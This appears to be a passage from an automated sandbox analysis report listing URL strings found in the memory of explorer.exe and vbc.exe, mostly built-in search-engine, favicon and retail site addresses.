Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp; String found in binary or memory: http://es.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
      Source: explorer.exe, 00000007.00000000.2193140646.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: explorer.exe, 00000007.00000000.2193140646.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
      Source: explorer.exe, 00000007.00000000.2187709209.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
      Source: explorer.exe, 00000007.00000000.2195506966.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
      Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
      Source: vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmpString found in binary or memory: http://twitter.com/statuses/user_timeline.xml?screen_name=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
      Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000007.00000000.2193140646.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000007.00000000.2187709209.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2193140646.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
